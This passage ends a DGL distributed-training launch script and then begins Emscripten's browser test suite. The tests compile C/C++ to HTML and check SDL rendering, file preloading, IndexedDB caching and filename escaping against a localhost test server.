help='The file (in workspace) of the partition config')
parser.add_argument('--ip_config', type=str,
help='The file (in workspace) of IP configuration for server processes')
parser.add_argument('--num_server_threads', type=int, default=1,
help='The number of OMP threads in the server process. \
It should be small if server processes and trainer processes run on \
the same machine. By default, it is 1.')
parser.add_argument('--graph_format', type=str, default='csc',
help='The format of the graph structure of each partition. \
The allowed formats are csr, csc and coo. A user can specify multiple \
formats, separated by ",". For example, the graph format is "csr,csc".')
parser.add_argument('--extra_envs', nargs='+', type=str, default=[],
help='Extra environment parameters need to be set. For example, \
you can set the LD_LIBRARY_PATH and NCCL_DEBUG by adding: \
--extra_envs LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH NCCL_DEBUG=INFO ')
args, udf_command = parser.parse_known_args()
assert len(udf_command) == 1, 'Please provide user command line.'
assert args.num_trainers is not None and args.num_trainers > 0, \
'--num_trainers must be a positive number.'
assert args.num_samplers is not None and args.num_samplers >= 0, \
'--num_samplers must be a non-negative number.'
assert args.num_servers is not None and args.num_servers > 0, \
'--num_servers must be a positive number.'
assert args.num_server_threads > 0, '--num_server_threads must be a positive number.'
assert args.workspace is not None, 'A user has to specify a workspace with --workspace.'
assert args.part_config is not None, \
'A user has to specify a partition configuration file with --part_config.'
assert args.ip_config is not None, \
'A user has to specify an IP configuration file with --ip_config.'
if args.num_omp_threads is None:
# Here we assume all machines have the same number of CPU cores as the machine
# where the launch script runs.
args.num_omp_threads = max(multiprocessing.cpu_count() // 2 // args.num_trainers, 1)
print('The number of OMP threads per trainer is set to', args.num_omp_threads)
udf_command = str(udf_command[0])
if 'python' not in udf_command:
raise RuntimeError("DGL launching script can only support Python executable file.")
submit_jobs(args, udf_command)
if __name__ == '__main__':
fmt = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=fmt, level=logging.INFO)
main()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_wasm_backend, flaky, create_test_file
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
# FIXME when the wasm backend gets threads
if is_chrome() and self.is_wasm_backend():
self.skipTest('wasm backend lacks threads')
return f(self)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
@no_wasm_backend('wasm source maps')
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'])
self.assertExists(html_file)
self.assertExists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
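# The injected locateFile below effectively does:
#   *.wasm        -> prefix + path   (left where the build put it)
#   anything else -> 'cdn/' + path   (e.g. test.data, which we move into cdn/)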
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test that an unknown protocol goes through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
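# Helper used by manual-reference tests below: injects reftest.js into the generated
# test.html and delays window.close() so pending rAF frames reach the screen before
# the reftest snapshot is taken.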
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
